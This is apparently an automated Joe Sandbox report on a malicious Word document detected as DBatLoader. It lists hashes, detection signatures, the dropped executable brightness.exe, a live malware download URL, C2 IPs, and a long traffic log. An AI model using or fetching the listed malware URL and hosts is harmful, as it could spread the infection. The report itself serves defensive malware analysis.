Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zYj1wg0cM2.doc

Overview

General Information

Sample name:zYj1wg0cM2.doc
(renamed file extension from none to doc, renamed because original name is a hash value)
Original sample name:96882b077a607f34cd963461341d728982e2075ffd4891f1b91e915da904cfe0
Analysis ID:1587350
MD5:3db6baf168cecc916012a59b6530175a
SHA1:7d74c680b09f982271a50483ce350a5b3d9a0996
SHA256:96882b077a607f34cd963461341d728982e2075ffd4891f1b91e915da904cfe0
Infos:

Detection

DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document exploit detected (process start blacklist hit)
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for sample
Office process drops PE file
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: File With Uncommon Extension Created By An Office Application
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 7244 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • brightness.exe (PID: 7972 cmdline: C:\Windows\SysWOW64\brightness.exe MD5: 483AB6BD562B28782D0999ABEC4F57F5)
  • cleanup
{"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}
SourceRuleDescriptionAuthorStrings
00000007.00000002.3375169126.000000007FBB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000007.00000002.3359324067.00000000022D6000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      SourceRuleDescriptionAuthorStrings
      7.2.brightness.exe.22d65a8.0.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        7.2.brightness.exe.28f0000.2.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          7.2.brightness.exe.22d65a8.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

            System Summary

            barindex
            Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 7244, TargetFilename: C:\Windows\SysWOW64\brightness.exe
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49736, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7244, Protocol: tcp, SourceIp: 147.124.216.113, SourceIsIpv6: false, SourcePort: 80
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: zYj1wg0cM2.docAvira: detected
            Source: http://amazonenviro.com/245_AiymwhpjxsgAvira URL Cloud: Label: malware
            Source: http://amazonenviro.com:80/245_AiymwhpjxsgAvira URL Cloud: Label: malware
            Source: 7.0.brightness.exe.400000.0.unpackMalware Configuration Extractor: DBatLoader {"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}
            Source: C:\Windows\SysWOW64\brightness.exeReversingLabs: Detection: 75%
            Source: zYj1wg0cM2.docVirustotal: Detection: 70%Perma Link
            Source: zYj1wg0cM2.docReversingLabs: Detection: 57%
            Source: zYj1wg0cM2.docJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_028F58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,7_2_028F58B4

            Software Vulnerabilities

            barindex
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Windows\SysWOW64\brightness.exeJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: brightness.exe.0.drJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\brightness.exe
            Source: global trafficDNS query: name: amazonenviro.com
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49752 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49754 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49756 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49759 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49761 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49763 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49765 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49767 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49770 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49772 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49774 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49777 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49787 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49796 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49803 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49815 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49822 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49831 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49841 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49847 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49855 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49863 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49872 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49882 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49889 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49900 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49908 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49916 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49925 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49934 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49944 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49953 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49962 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49971 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49980 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49987 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49995 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50003 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50012 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50022 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50030 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50040 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50048 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50057 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50067 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50074 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50084 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50093 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50101 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50108 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50116 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50122 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50124 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50126 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50128 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50130 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50133 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50135 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50137 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50139 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50141 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50143 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50145 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50147 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50149 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50151 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50153 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50155 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50157 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50159 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50161 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50163 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50165 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50167 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50169 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50171 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50173 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50175 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50177 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50179 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50181 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50183 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50185 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50187 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50189 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50191 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50193 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50195 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50197 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50199 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50201 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50203 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50205 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50207 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50209 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50211 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50213 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50215 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50217 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50219 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50221 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50223 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50225 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50227 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50229 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50231 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50233 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50235 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50237 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50239 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50241 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50243 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50245 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:50247 -> 166.62.27.188:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 192.168.2.4:49736 -> 147.124.216.113:80
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
            Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49736
